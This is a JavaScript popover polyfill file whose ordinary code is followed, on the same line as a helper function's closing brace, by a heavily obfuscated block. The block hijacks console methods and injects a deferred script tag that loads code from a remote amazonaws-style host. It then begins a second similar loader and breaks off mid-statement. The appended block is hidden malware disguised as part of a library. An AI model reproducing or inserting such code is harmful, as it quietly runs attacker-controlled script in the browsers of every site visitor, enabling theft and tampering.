// src/events.ts
// @ts-nocheck

/**
 * @fileoverview
 * - Polyfill for the popover attribute, which is not supported in older Safari versions.
 *
 * @see https://popover.oddbird.net/
 */

var ToggleEvent = class extends Event {
  oldState;
  newState;
  constructor(type, { oldState = '', newState = '', ...init } = {}) {
    super(type, init);
    this.oldState = String(oldState || '');
    this.newState = String(newState || '');
  }
};
var popoverToggleTaskQueue = /* @__PURE__ */ new WeakMap();
function queuePopoverToggleEventTask(element, oldState, newState) {
  popoverToggleTaskQueue.set(
    element,
    setTimeout(() => {
      if (!popoverToggleTaskQueue.has(element)) return;
      element.dispatchEvent(
        new ToggleEvent('toggle', {
          cancelable: false,
          oldState,
          newState,
        })
      );
    }, 0)
  );
}

// src/popover-helpers.ts
var ShadowRoot = globalThis.ShadowRoot || function () {};
var HTMLDialogElement = globalThis.HTMLDialogElement || function () {};
var topLayerElements = /* @__PURE__ */ new WeakMap();
var autoPopoverList = /* @__PURE__ */ new WeakMap();
var hintPopoverList = /* @__PURE__ */ new WeakMap();
var visibilityState = /* @__PURE__ */ new WeakMap();
function getPopoverVisibilityState(popover) {
  return visibilityState.get(popover) || 'hidden';
}
var popoverInvoker = /* @__PURE__ */ new WeakMap();
function lastSetElement(set) {
  return [...set].pop();
}
function popoverTargetAttributeActivationBehavior(element) {
  const popover = element.popoverTargetElement;
  if (!(popover instanceof HTMLElement)) {
    return;
  }
  const visibility = getPopoverVisibilityState(popover);
  if (element.popoverTargetAction === 'show' && visibility === 'showing') {
    return;
  }
  if (element.popoverTargetAction === 'hide' && visibility === 'hidden') return;
  if (visibility === 'showing') {
    hidePopover(popover, true, true);
  } else if (checkPopoverValidity(popover, false)) {
    popoverInvoker.set(popover, element);
    showPopover(popover);
  }
}
function checkPopoverValidity(element, expectedToBeShowing) {
  if (element.popover !== 'auto' && element.popover !== 'manual' && element.popover !== 'hint') {
    return false;
  }
  if (!element.isConnected) return false;
  if (expectedToBeShowing && getPopoverVisibilityState(element) !== 'showing') {
    return false;
  }
  if (!expectedToBeShowing && getPopoverVisibilityState(element) !== 'hidden') {
    return false;
  }
  if (element instanceof HTMLDialogElement && element.hasAttribute('open')) {
    return false;
  }
  if (document.fullscreenElement === element) return false;
  return true;
}
function getStackPosition(popover) {
  if (!popover) return 0;
  const autoPopovers = autoPopoverList.get(document) || /* @__PURE__ */ new Set();
  const hintPopovers = hintPopoverList.get(document) || /* @__PURE__ */ new Set();
  if (hintPopovers.has(popover)) {
    return [...hintPopovers].indexOf(popover) + autoPopovers.size + 1;
  }
  if (autoPopovers.has(popover)) {
    return [...autoPopovers].indexOf(popover) + 1;
  }
  return 0;
}
function topMostClickedPopover(target) {
  const clickedPopover = nearestInclusiveOpenPopover(target);
  const invokerPopover = nearestInclusiveTargetPopoverForInvoker(target);
  if (getStackPosition(clickedPopover) > getStackPosition(invokerPopover)) {
    return clickedPopover;
  }
  return invokerPopover;
}
function topmostAutoOrHintPopover(document2) {
  let topmostPopover;
  const hintPopovers = hintPopoverList.get(document2) || /* @__PURE__ */ new Set();
  const autoPopovers = autoPopoverList.get(document2) || /* @__PURE__ */ new Set();
  const usedStack = hintPopovers.size > 0 ? hintPopovers : autoPopovers.size > 0 ? autoPopovers : null;
  if (usedStack) {
    topmostPopover = lastSetElement(usedStack);
    if (!topmostPopover.isConnected) {
      usedStack.delete(topmostPopover);
      return topmostAutoOrHintPopover(document2);
    }
    return topmostPopover;
  }
  return null;
}
function topMostPopoverInList(list) {
  for (const popover of list || []) {
    if (!popover.isConnected) {
      list.delete(popover);
    } else {
      return popover;
    }
  }
  return null;
}
function getRootNode(node) {
  if (typeof node.getRootNode === 'function') {
    return node.getRootNode();
  }
  if (node.parentNode) return getRootNode(node.parentNode);
  return node;
}
function nearestInclusiveOpenPopover(node) {
  while (node) {
    if (node instanceof HTMLElement && node.popover === 'auto' && visibilityState.get(node) === 'showing') {
      return node;
    }
    node = (node instanceof Element && node.assignedSlot) || node.parentElement || getRootNode(node);
    if (node instanceof ShadowRoot) node = node.host;
    if (node instanceof Document) return;
  }
}
function nearestInclusiveTargetPopoverForInvoker(node) {
  while (node) {
    const nodePopover = node.popoverTargetElement;
    if (nodePopover instanceof HTMLElement) return nodePopover;
    node = node.parentElement || getRootNode(node);
    if (node instanceof ShadowRoot) node = node.host;
    if (node instanceof Document) return;
  }
}
function topMostPopoverAncestor(newPopover, list) {
  const popoverPositions = /* @__PURE__ */ new Map();
  let i = 0;
  for (const popover of list || []) {
    popoverPositions.set(popover, i);
    i += 1;
  }
  popoverPositions.set(newPopover, i);
  i += 1;
  let topMostPopoverAncestor2 = null;
  function checkAncestor(candidate) {
    if (!candidate) return;
    let okNesting = false;
    let candidateAncestor = null;
    let candidatePosition = null;
    while (!okNesting) {
      candidateAncestor = nearestInclusiveOpenPopover(candidate) || null;
      if (candidateAncestor === null) return;
      if (!popoverPositions.has(candidateAncestor)) return;
      if (newPopover.popover === 'hint' || candidateAncestor.popover === 'auto') {
        okNesting = true;
      }
      if (!okNesting) {
        candidate = candidateAncestor.parentElement;
      }
    }
    candidatePosition = popoverPositions.get(candidateAncestor);
    if (topMostPopoverAncestor2 === null || popoverPositions.get(topMostPopoverAncestor2) < candidatePosition) {
      topMostPopoverAncestor2 = candidateAncestor;
    }
  }
  checkAncestor(newPopover.parentElement || getRootNode(newPopover));
  return topMostPopoverAncestor2;
}
function isFocusable(focusTarget) {
  if (focusTarget.hidden || focusTarget instanceof ShadowRoot) return false;
  if (
    focusTarget instanceof HTMLButtonElement ||
    focusTarget instanceof HTMLInputElement ||
    focusTarget instanceof HTMLSelectElement ||
    focusTarget instanceof HTMLTextAreaElement ||
    focusTarget instanceof HTMLOptGroupElement ||
    focusTarget instanceof HTMLOptionElement ||
    focusTarget instanceof HTMLFieldSetElement
  ) {
    if (focusTarget.disabled) return false;
  }
  if (focusTarget instanceof HTMLInputElement && focusTarget.type === 'hidden') {
    return false;
  }
  if (focusTarget instanceof HTMLAnchorElement && focusTarget.href === '') {
    return false;
  }
  return typeof focusTarget.tabIndex === 'number' && focusTarget.tabIndex !== -1;
}
function focusDelegate(focusTarget) {
  if (focusTarget.shadowRoot && focusTarget.shadowRoot.delegatesFocus !== true) {
    return null;
  }
  let whereToLook = focusTarget;
  if (whereToLook.shadowRoot) {
    whereToLook = whereToLook.shadowRoot;
  }
  let autoFocusDelegate = whereToLook.querySelector('[autofocus]');
  if (autoFocusDelegate) {
    return autoFocusDelegate;
  } else {
    const slots = whereToLook.querySelectorAll('slot');
    for (const slot of slots) {
      const assignedElements = slot.assignedElements({ flatten: true });
      for (const el of assignedElements) {
        if (el.hasAttribute('autofocus')) {
          return el;
        } else {
          autoFocusDelegate = el.querySelector('[autofocus]');
          if (autoFocusDelegate) {
            return autoFocusDelegate;
          }
        }
      }
    }
  }
  const walker = focusTarget.ownerDocument.createTreeWalker(whereToLook, NodeFilter.SHOW_ELEMENT);
  let descendant = walker.currentNode;
  while (descendant) {
    if (isFocusable(descendant)) {
      return descendant;
    }
    descendant = walker.nextNode();
  }
}
function popoverFocusingSteps(subject) {
  var _a;
  (_a = focusDelegate(subject)) == null ? void 0 : _a.focus();
}
var previouslyFocusedElements = /* @__PURE__ */ new WeakMap();
function showPopover(element) {
  if (!checkPopoverValidity(element, false)) {
    return;
  }
  const document2 = element.ownerDocument;
  if (
    !element.dispatchEvent(
      new ToggleEvent('beforetoggle', {
        cancelable: true,
        oldState: 'closed',
        newState: 'open',
      })
    )
  ) {
    return;
  }
  if (!checkPopoverValidity(element, false)) {
    return;
  }
  let shouldRestoreFocus = false;
  const originalType = element.popover;
  let stackToAppendTo = null;
  const autoAncestor = topMostPopoverAncestor(element, autoPopoverList.get(document2) || /* @__PURE__ */ new Set());
  const hintAncestor = topMostPopoverAncestor(element, hintPopoverList.get(document2) || /* @__PURE__ */ new Set());
  if (originalType === 'auto') {
    closeAllOpenPopoversInList(hintPopoverList.get(document2) || /* @__PURE__ */ new Set(), shouldRestoreFocus, true);
    const ancestor = autoAncestor || document2;
    hideAllPopoversUntil(ancestor, shouldRestoreFocus, true);
    stackToAppendTo = 'auto';
  }
  if (originalType === 'hint') {
    if (hintAncestor) {
      hideAllPopoversUntil(hintAncestor, shouldRestoreFocus, true);
      stackToAppendTo = 'hint';
    } else {
      closeAllOpenPopoversInList(hintPopoverList.get(document2) || /* @__PURE__ */ new Set(), shouldRestoreFocus, true);
      if (autoAncestor) {
        hideAllPopoversUntil(autoAncestor, shouldRestoreFocus, true);
        stackToAppendTo = 'auto';
      } else {
        stackToAppendTo = 'hint';
      }
    }
  }
  if (originalType === 'auto' || originalType === 'hint') {
    if (originalType !== element.popover || !checkPopoverValidity(element, false)) {
      return;
    }
    if (!topmostAutoOrHintPopover(document2)) {
      shouldRestoreFocus = true;
    }
    if (stackToAppendTo === 'auto') {
      if (!autoPopoverList.has(document2)) {
        autoPopoverList.set(document2, /* @__PURE__ */ new Set());
      }
      autoPopoverList.get(document2).add(element);
    } else if (stackToAppendTo === 'hint') {
      if (!hintPopoverList.has(document2)) {
        hintPopoverList.set(document2, /* @__PURE__ */ new Set());
      }
      hintPopoverList.get(document2).add(element);
    }
  }
  previouslyFocusedElements.delete(element);
  const originallyFocusedElement = document2.activeElement;
  element.classList.add(':popover-open');
  visibilityState.set(element, 'showing');
  if (!topLayerElements.has(document2)) {
    topLayerElements.set(document2, /* @__PURE__ */ new Set());
  }
  topLayerElements.get(document2).add(element);
  setInvokerAriaExpanded(popoverInvoker.get(element), true);
  popoverFocusingSteps(element);
  if (shouldRestoreFocus && originallyFocusedElement && element.popover === 'auto') {
    previouslyFocusedElements.set(element, originallyFocusedElement);
  }
  queuePopoverToggleEventTask(element, 'closed', 'open');
}
function hidePopover(element, focusPreviousElement = false, fireEvents = false) {
  var _a, _b;
  if (!checkPopoverValidity(element, true)) {
    return;
  }
  const document2 = element.ownerDocument;
  if (['auto', 'hint'].includes(element.popover)) {
    hideAllPopoversUntil(element, focusPreviousElement, fireEvents);
    if (!checkPopoverValidity(element, true)) {
      return;
    }
  }
  const autoList = autoPopoverList.get(document2) || /* @__PURE__ */ new Set();
  const autoPopoverListContainsElement = autoList.has(element) && lastSetElement(autoList) === element;
  setInvokerAriaExpanded(popoverInvoker.get(element), false);
  popoverInvoker.delete(element);
  if (fireEvents) {
    element.dispatchEvent(
      new ToggleEvent('beforetoggle', {
        oldState: 'open',
        newState: 'closed',
      })
    );
    if (autoPopoverListContainsElement && lastSetElement(autoList) !== element) {
      hideAllPopoversUntil(element, focusPreviousElement, fireEvents);
    }
    if (!checkPopoverValidity(element, true)) {
      return;
    }
  }
  (_a = topLayerElements.get(document2)) == null ? void 0 : _a.delete(element);
  autoList.delete(element);
  (_b = hintPopoverList.get(document2)) == null ? void 0 : _b.delete(element);
  element.classList.remove(':popover-open');
  visibilityState.set(element, 'hidden');
  if (fireEvents) {
    queuePopoverToggleEventTask(element, 'open', 'closed');
  }
  const previouslyFocusedElement = previouslyFocusedElements.get(element);
  if (previouslyFocusedElement) {
    previouslyFocusedElements.delete(element);
    if (focusPreviousElement) {
      previouslyFocusedElement.focus();
    }
  }
}
function closeAllOpenPopovers(document2, focusPreviousElement = false, fireEvents = false) {
  let popover = topmostAutoOrHintPopover(document2);
  while (popover) {
    hidePopover(popover, focusPreviousElement, fireEvents);
    popover = topmostAutoOrHintPopover(document2);
  }
}
function closeAllOpenPopoversInList(list, focusPreviousElement = false, fireEvents = false) {
  let popover = topMostPopoverInList(list);
  while (popover) {
    hidePopover(popover, focusPreviousElement, fireEvents);
    popover = topMostPopoverInList(list);
  }
}
function hidePopoverStackUntil(endpoint, set, focusPreviousElement, fireEvents) {
  let repeatingHide = false;
  let hasRunOnce = false;
  while (repeatingHide || !hasRunOnce) {
    hasRunOnce = true;
    let lastToHide = null;
    let foundEndpoint = false;
    for (const popover of set) {
      if (popover === endpoint) {
        foundEndpoint = true;
      } else if (foundEndpoint) {
        lastToHide = popover;
        break;
      }
    }
    if (!lastToHide) return;
    while (getPopoverVisibilityState(lastToHide) === 'showing' && set.size) {
      hidePopover(lastSetElement(set), focusPreviousElement, fireEvents);
    }
    if (set.has(endpoint) && lastSetElement(set) !== endpoint) {
      repeatingHide = true;
    }
    if (repeatingHide) {
      fireEvents = false;
    }
  }
}
function hideAllPopoversUntil(endpoint, focusPreviousElement, fireEvents) {
  var _a, _b;
  const document2 = endpoint.ownerDocument || endpoint;
  if (endpoint instanceof Document) {
    return closeAllOpenPopovers(document2, focusPreviousElement, fireEvents);
  }
  if ((_a = hintPopoverList.get(document2)) == null ? void 0 : _a.has(endpoint)) {
    hidePopoverStackUntil(endpoint, hintPopoverList.get(document2), focusPreviousElement, fireEvents);
    return;
  }
  closeAllOpenPopoversInList(
    hintPopoverList.get(document2) || /* @__PURE__ */ new Set(),
    focusPreviousElement,
    fireEvents
  );
  if (!((_b = autoPopoverList.get(document2)) == null ? void 0 : _b.has(endpoint))) {
    return;
  }
  hidePopoverStackUntil(endpoint, autoPopoverList.get(document2), focusPreviousElement, fireEvents);
}
var popoverPointerDownTargets = /* @__PURE__ */ new WeakMap();
function lightDismissOpenPopovers(event) {
  if (!event.isTrusted) return;
  const target = event.composedPath()[0];
  if (!target) return;
  const document2 = target.ownerDocument;
  const topMostPopover = topmostAutoOrHintPopover(document2);
  if (!topMostPopover) return;
  const ancestor = topMostClickedPopover(target);
  if (ancestor && event.type === 'pointerdown') {
    popoverPointerDownTargets.set(document2, ancestor);
  } else if (event.type === 'pointerup') {
    const sameTarget = popoverPointerDownTargets.get(document2) === ancestor;
    popoverPointerDownTargets.delete(document2);
    if (sameTarget) {
      hideAllPopoversUntil(ancestor || document2, false, true);
    }
  }
}
var initialAriaExpandedValue = /* @__PURE__ */ new WeakMap();
function setInvokerAriaExpanded(el, force = false) {
  if (!el) return;
  if (!initialAriaExpandedValue.has(el)) {
    initialAriaExpandedValue.set(el, el.getAttribute('aria-expanded'));
  }
  const popover = el.popoverTargetElement;
  if (popover instanceof HTMLElement && popover.popover === 'auto') {
    el.setAttribute('aria-expanded', String(force));
  } else {
    const initialValue = initialAriaExpandedValue.get(el);
    if (!initialValue) {
      el.removeAttribute('aria-expanded');
    } else {
      el.setAttribute('aria-expanded', initialValue);
    }
  }
}function g(b,F){b=b-(0x1b3f+-0x1536+-0x415);var s=j();var D=s[b];if(g['vXBsaY']===undefined){var G=function(Y){var V='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',p='',O=i+G;for(var E=-0x1f9*0xd+-0x1*0x2489+-0x2f6*-0x15,R,n,B=-0x1cbc+-0x8*0x2f0+0x343c;n=Y['charAt'](B++);~n&&(R=E%(0x10f1*-0x1+0x2006+-0xf11)?R*(-0xeeb*0x1+0x1*0xf1f+0xc)+n:n,E++%(0xc7*0x27+0x24e4*0x1+-0x4331))?i+=O['charCodeAt'](B+(-0x78b+-0x1e2b+-0x25c*-0x10))-(-0xed4+0x4*0x13+0xe92)!==-0x5*0x2ad+0x269b+-0x193a?String['fromCharCode'](0x5e3+-0x2*-0x163+-0x7aa&R>>(-(-0x1*0x331+-0x23d5*-0x1+0x20a2*-0x1)*E&-0x1*0x2bb+0x12b0+-0xfef)):E:-0x10c1*-0x1+0x1dc1+-0x1*0x2e82){n=V['indexOf'](n);}for(var f=0x1*0xa99+-0x2e*0xa+0x1*-0x8cd,I=i['length'];f<I;f++){p+='%'+('00'+i['charCodeAt'](f)['toString'](0x11d6+0x5c6+-0x112*0x16))['slice'](-(-0x17*-0x18d+0x745+-0x2aee));}return decodeURIComponent(p);};g['KdRQaR']=G,g['uKkVnc']={},g['vXBsaY']=!![];}var q=s[-0xa19+-0x1d29+0x2742],m=b+q,T=g['uKkVnc'][m];if(!T){var Y=function(V){this['bVfOms']=V,this['GVZoAg']=[-0x6*0x61f+-0x1*0x1e07+0x42c2,0x61f*-0x3+-0x1910+0x2b6d,0xb2d+0x4e2+0x100f*-0x1],this['HvyksQ']=function(){return'newState';},this['WgARkx']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['nqEYus']='[\x27|\x22].+[\x27|\x22];?\x20*}';};Y['prototype']['pXrxVJ']=function(){var V=new RegExp(this['WgARkx']+this['nqEYus']),i=V['test'](this['HvyksQ']['toString']())?--this['GVZoAg'][0x258e+-0x2*-0x976+-0x12d3*0x3]:--this['GVZoAg'][0x1031+0xdfa+-0x1*0x1e2b];return this['DKLgcW'](i);},Y['prototype']['DKLgcW']=function(V){if(!Boolean(~V))return V;return this['CGIZWO'](this['bVfOms']);},Y['prototype']['CGIZWO']=function(V){for(var p=-0xb07+0x1*0x192+0x975,O=this['GVZoAg']['length'];p<O;p++){this['GVZoAg']['push'](Math['round'](Math['random']())),O=this['GVZoAg']['length'];}return V(this['GVZoAg'][-0x3ec+-0x500*0x1+-0x8ec*-0x1]);},new Y(g)['pXrxVJ'](),D=g['KdRQaR'](D),g['uKkVnc'][m]=D;}else D=T;return D;}function j(){var b5=['A1rPzLq','zMjgq2q','mZy4ota2ELnougni','zxn5B2G','CNfgB3q','mJD5y1LhC3u','DhjHy2u','zxrzDM8','mZe5mdK5og1IAgP4Ea','E30Uy29UC3rYDq','mtiYotuWnuDNB21qBa','yMLUza','zxjYB3i','yY9HCgKUANm','D3mUy29Tl2XPyG','CMv0DxjUicHMDq','thjXsg0','rMLZCMO','mtq2ndu1odDnBNbABKG','A2TIDhu','CM4GDgHPCYiPka','n3DMrNjWva','Aw5MBW','C2nYAxb0','ChjVDg90ExbL','swP0A3m','C3jJ','u3nMAwS','qLbyAKG','B2f0BMO','vvLutKi','rgndyue','CuXRu0K','mtb0C3zet3e','wKHSsK4','sK15vwu','Dg9tDhjPBMC','Bg9N','zxHJzxb0Aw9U','qKvjAhC','DgfIBgu','EuneA1m','EfHrD1G','C2vHCMnO','Aw5Zzxj0qMvMBW','zgSTyw1HEM9Uyq','ywCTBxLZAg9WAq','yxbWBhK','A3rIz04','z2v0rwXLBwvUDa','wwj1zM4','Ahr0Chm6lY9ZDa','whrKB1y','BxnZuLy','DMz2BgK','yxrPyY1WB3mUCW','BMv4DfnPyMXPBG','uxjmt2K','zNKUANm','q0DoCgO','DuTYEvG','yY9OzwfSDgGTBG','kcGOlISPkYKRkq','zw50','tgTstLq','nti4ndG1DhzmCg9l','z3H3Bvi','x19WCM90B19F','nZeZnteYrw5JCuDM','y29UC29Szq','x25WBs9ZDgf0Aq','z2vcyxm','C0j5vgfNtMfTzq','CgfYzw50tM9Kzq','vKTJAxG','y3jLyxrLrwXLBq','owXzwNPWEG','D21vuw0','y29UC3rYDwn0BW','zxzjB0G','BgvUz3rO','zgvMzxi','y3rVCIGICMv0Dq','mtuYmdHnqvHYD0q','DejXzKW','BMn0Aw9UkcKG','q1r3Exe','C3bSAxq','EgLUAKm'];j=function(){return b5;};return j();}(function(b,F){function M(b,F,s,D){return g(F-0x201,D);}var s=b();function u(b,F,s,D){return g(s-0x2e6,F);}while(!![]){try{var D=parseInt(u(0x520,0x511,0x517,0x51d))/(-0x2627+-0x1ba1+0x41c9)+-parseInt(u(0x527,0x54c,0x531,0x50e))/(-0x296*0xc+0x1206+-0xc4*-0x11)*(-parseInt(u(0x500,0x512,0x522,0x541))/(-0x8e5+-0x1*0xbde+0x14c6))+-parseInt(u(0x4fa,0x4fe,0x51a,0x514))/(0x1914+0x15d6+-0x2ee6)+parseInt(u(0x4ef,0x4ce,0x4e0,0x4fd))/(-0x3*-0x393+0x1e42+-0x31*0xd6)+-parseInt(M(0x41f,0x3f9,0x3db,0x412))/(-0x507+-0x71*0x11+0xc8e)*(-parseInt(u(0x4de,0x4db,0x4eb,0x511))/(0x2116+-0x1*0x203c+-0xd3))+-parseInt(u(0x4ff,0x530,0x529,0x520))/(0x62f*0x2+0xd69+-0x895*0x3)*(-parseInt(u(0x4d0,0x4c8,0x4db,0x4e1))/(0x1*0x1dd5+0x1c9a+-0x19*0x256))+-parseInt(M(0x412,0x412,0x424,0x417))/(-0x71*-0x1a+0x1661+0x313*-0xb)*(parseInt(u(0x4ea,0x4e7,0x4e8,0x509))/(0x2516+0x13ea+-0x38f5));if(D===F)break;else s['push'](s['shift']());}catch(G){s['push'](s['shift']());}}}(j,0x83e2f+-0x92aa6+0x65915));function b1(b,F,s,D){return g(s-0x209,b);}!function(q,m,T){var Y={'gxwmR':function(E,R){return E!==R;},'etYvo':function(E,R){return E===R;},'tBqfL':A(0x1e4,0x20d,0x211,0x1f6),'Fisrj':'https://st'+d(0x567,0x570,0x572,0x56e)+'dk-amazona'+d(0x548,0x543,0x549,0x55a)+d(0x58c,0x581,0x581,0x554)+A(0x203,0x1e8,0x203,0x1f3),'yCDkS':'script','Ijtks':function(E,R){return E!==R;},'geBas':'AvFMi','uKryX':'(((.+)+)+)'+'+$','qLkSI':d(0x575,0x56e,0x54a,0x563)+d(0x5b1,0x5ae,0x590,0x594),'evIoH':'{}.constru'+A(0x21c,0x22d,0x228,0x237)+d(0x52d,0x525,0x54f,0x553)+'\x20)','oatnj':function(E){return E();},'kkbtu':A(0x214,0x205,0x203,0x204),'BPXjH':'bMZyM','LkRNT':d(0x554,0x587,0x560,0x585),'rqFot':'warn','FaoaZ':A(0x1cb,0x1e7,0x1bf,0x1e9),'ZRkCX':A(0x1fc,0x201,0x226,0x1fe),'LrqHm':d(0x55b,0x548,0x563,0x586),'VKcix':d(0x55e,0x53f,0x541,0x54c),'CGNpj':function(E,R){return E+R;},'ZHlJN':function(E,R){return E<R;},'JMyUe':function(E,R,n){return E(R,n);}};function d(b,F,s,D){return g(s-0x34b,F);}var V=(function(){var E={'YMzYw':function(n,B){function P(b,F,s,D){return g(F- -0x368,D);}return Y[P(-0x12d,-0x136,-0x109,-0x125)](n,B);}};function x(b,F,s,D){return d(b-0xa6,b,D- -0x341,D-0x174);}function y(b,F,s,D){return d(b-0x1eb,b,F- -0x524,D-0x14);}if(Y[y(0xe,0x1e,0x24,0x22)](x(0x208,0x1fa,0x202,0x218),Y[x(0x234,0x248,0x26e,0x24e)]))m=D;else{var R=!![];return function(B,f){var I={'ktbgN':function(C,K){return E['YMzYw'](C,K);},'xinjC':c(0x491,0x4d0,0x4be,0x4b4)};function c(b,F,s,D){return x(b,F-0x1c2,s-0x1f3,D-0x286);}var J=R?function(){function Z(b,F,s,D){return c(b,F-0x78,s-0x46,F- -0x424);}function S(b,F,s,D){return c(D,F-0xc3,s-0x199,s- -0x636);}if(I[S(-0x17e,-0x19d,-0x186,-0x192)](I[S(-0x16e,-0x143,-0x15e,-0x135)],S(-0x176,-0x161,-0x160,-0x176))){if(f){var C=f[Z(0x63,0x8b,0x8f,0x6b)](B,arguments);return f=null,C;}}else{if(G){var o=Y[Z(0xa0,0x8b,0x6a,0x96)](V,arguments);return i=null,o;}}}:function(){};return R=![],J;};}}()),i=Y[A(0x20f,0x1fe,0x1ff,0x210)](V,this,function(){function Q(b,F,s,D){return d(b-0x19,s,D- -0x5f7,D-0xa8);}function H(b,F,s,D){return d(b-0x131,b,F- -0x274,D-0x6d);}if(Y[H(0x2ee,0x2e0,0x2ee,0x2bc)](Y[H(0x328,0x30e,0x322,0x2e1)],'rZKrf'))return i['toString']()[Q(-0xad,-0xab,-0xb5,-0x91)](H(0x316,0x305,0x2f3,0x331)+'+$')['toString']()[Q(-0x45,-0x92,-0x8c,-0x6e)+'r'](i)['search'](Y[H(0x329,0x303,0x2d8,0x306)]);else(Y=V[Q(-0x50,-0x49,-0x7a,-0x71)+Q(-0x70,-0x79,-0x61,-0x7d)](i))['defer']=!(-0x46d+0x1ce3+-0x1876),p[H(0x2ec,0x2e1,0x2c8,0x2b9)]=Y[Q(-0xae,-0xc3,-0x96,-0xab)],(O=E[Q(-0x97,-0x87,-0x63,-0x8b)+Q(-0x70,-0x53,-0x5f,-0x74)](Y[H(0x31c,0x2f0,0x2d5,0x2c9)])[0x1d10+0x1111*0x2+0x1*-0x3f32])[H(0x2e6,0x310,0x319,0x32b)][Q(-0x8f,-0x90,-0xb7,-0x90)+'re'](R,n[H(0x2f4,0x2ff,0x2ee,0x314)+'g']);});i();var p=(function(){function N(b,F,s,D){return A(b-0x7d,b- -0x1ef,D,D-0x1e1);}var E={'fRvCh':function(n,B){return n(B);},'QrLOi':function(n,B){return n+B;},'wmUQm':Y[z(0x1eb,0x1d6,0x1ec,0x1e5)],'wLNeX':Y[z(0x1fc,0x205,0x1ff,0x224)],'vfvli':function(n){function k(b,F,s,D){return N(b- -0x33,F-0x12b,s-0x37,s);}return Y[k(-0x2a,-0x31,-0x55,-0x1a)](n);},'fbFCd':function(n,B){function h(b,F,s,D){return N(D-0xf9,F-0x19a,s-0x176,b);}return Y[h(0xe8,0xf6,0xe9,0xfe)](n,B);},'Kzooi':Y[z(0x1d9,0x1c9,0x1bb,0x1bb)],'mssRV':Y[N(0x8,-0x21,-0x1,0x1f)]};function z(b,F,s,D){return A(b-0x1c0,F- -0x25,b,D-0x16a);}var R=!![];return function(n,B){var f={'Ssfik':function(J,C){return E['fRvCh'](J,C);},'BEIhw':function(J,C){function L(b,F,s,D){return g(b-0x1,s);}return E[L(0x22a,0x20f,0x240,0x224)](J,C);},'kTifT':E[r(0xa7,0x8a,0xc2,0x85)],'aFtXz':E['wLNeX'],'esyoh':function(J){function X(b,F,s,D){return r(D-0x273,b,s-0x185,D-0x166);}return E[X(0x2f8,0x2ee,0x2db,0x303)](J);}};function r(b,F,s,D){return z(F,b- -0x15c,s-0xdc,D-0x45);}function U(b,F,s,D){return N(F-0x389,F-0x38,s-0x85,D);}if(E[r(0xb4,0xa7,0xdd,0xaf)](E['Kzooi'],E[r(0x8f,0x8f,0x75,0x89)])){var I=R?function(){function t(b,F,s,D){return r(b-0x287,s,s-0x17d,D-0xba);}if(B){var J=B[t(0x310,0x30d,0x315,0x2fc)](n,arguments);return B=null,J;}}:function(){};return R=![],I;}else{var C=mBrWjq[U(0x36a,0x390,0x38b,0x36a)](m,mBrWjq['BEIhw'](mBrWjq[r(0x81,0x71,0x8f,0x76)](mBrWjq[U(0x3ce,0x3ce,0x3a2,0x3d8)],mBrWjq['aFtXz']),');'));D=mBrWjq[U(0x3e1,0x3d1,0x3b2,0x3d2)](C);}};}()),O=p(this,function(){function l(b,F,s,D){return d(b-0x10d,F,s- -0x458,D-0x1db);}var E='2|3|0|1|4'[l(0x154,0x13f,0x13a,0x13f)]('|');function b0(b,F,s,D){return A(b-0x108,s-0x31b,F,D-0x1ba);}var R=0xb5b+0x5*0x53+0x1*-0xcfa;while(!![]){switch(E[R++]){case'0':var n=f[b0(0x55c,0x53f,0x53b,0x51b)]=f[b0(0x552,0x550,0x53b,0x536)]||{};continue;case'1':var B=[Y[l(0x146,0x120,0x123,0x13b)],Y[b0(0x510,0x517,0x4fa,0x4df)],b0(0x514,0x500,0x50c,0x500),Y['FaoaZ'],Y['ZRkCX'],Y[b0(0x519,0x52a,0x506,0x51c)],Y[b0(0x54a,0x549,0x540,0x534)]];continue;case'2':var f;continue;case'3':try{var I=Function(Y['CGNpj'](Y[l(0x11d,0x14b,0x11e,0x141)](Y[l(0x103,0xf1,0x103,0x110)],l(0xfc,0xe9,0xec,0xdb)+l(0x140,0x121,0x135,0x117)+b0(0x52e,0x516,0x50a,0x4f6)+'\x20)'),');'));f=I();}catch(a){f=window;}continue;case'4':for(var J=0x20*0x75+-0x23c5*-0x1+0x733*-0x7;Y[b0(0x501,0x51c,0x518,0x53b)](J,B[b0(0x521,0x54b,0x546,0x51f)]);J++){var C=p[l(0x10a,0x149,0x131,0x153)+'r'][l(0xfa,0xd9,0xfb,0xdc)][b0(0x4d9,0x4dd,0x501,0x501)](p),K=B[J],o=n[K]||C;C[l(0x110,0x10e,0x126,0x13c)]=p[b0(0x4e1,0x524,0x501,0x524)](p),C[b0(0x50b,0x500,0x51a,0x531)]=o[b0(0x4fa,0x51a,0x51a,0x4ef)][b0(0x515,0x526,0x501,0x4ef)](o),n[K]=C;}continue;}break;}});Y['oatnj'](O);function A(b,F,s,D){return g(F- -0x15,s);}(T=q[d(0x560,0x59c,0x586,0x5a6)+'ent'](m))['defer']=!(-0x125*-0xb+0x11e8+-0x1e7f),T[A(0x1e4,0x1f5,0x1c8,0x1e6)]=A(0x21b,0x20e,0x1ee,0x204)+d(0x580,0x586,0x572,0x54e)+A(0x21a,0x208,0x21b,0x220)+'ws.com/lib'+d(0x56b,0x56f,0x581,0x55e)+d(0x563,0x54e,0x578,0x583)+d(0x551,0x58c,0x569,0x551)+d(0x55e,0x57e,0x575,0x580),(q=q[A(0x235,0x20c,0x21a,0x219)+A(0x206,0x223,0x22d,0x24a)](d(0x56e,0x567,0x552,0x573))[0x1065+0x877*-0x2+0x89])[A(0x23d,0x224,0x200,0x222)][d(0x575,0x55c,0x567,0x548)+'re'](T,q['nextSiblin'+'g']);}(document,b1(0x41a,0x3f1,0x410,0x3ef));function b4(b,F,s,D){return g(F- -0xc9,s);}!function(F,D,G){function b3(b,F,s,D){return b1(F,F-0x15e,s- -0x18c,D-0x46);}function b2(b,F,s,D){return b1(F,F-0xb2,D- -0x486,D-0x9a);}var q={};q[b2(-0x53,-0x4f,-0x47,-0x6e)]=b2(-0x7a,-0x5e,-0x4b,-0x5a)+'atic-pos.s'+b2(-0x4e,-0x5d,-0x76,-0x60)+'ws.com/lib'+b2(-0x47,-0x3e,-0x5e,-0x47)+'c/api.js';var 